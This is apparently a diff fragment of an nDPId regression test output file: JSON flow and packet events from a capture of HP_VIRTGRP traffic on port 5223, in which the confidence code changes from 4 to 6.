00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-payload-len":1566,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1614876808445} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":61,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":2088,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":28,"global_ts_msec":1614877863379} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":2866,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1614880256676} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":91,"packets-processed":90,"total-skipped-flows":0,"total-l4-payload-len":3481,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1614892184461} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"} 
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-payload-len":4061,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1614894888601} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="} 
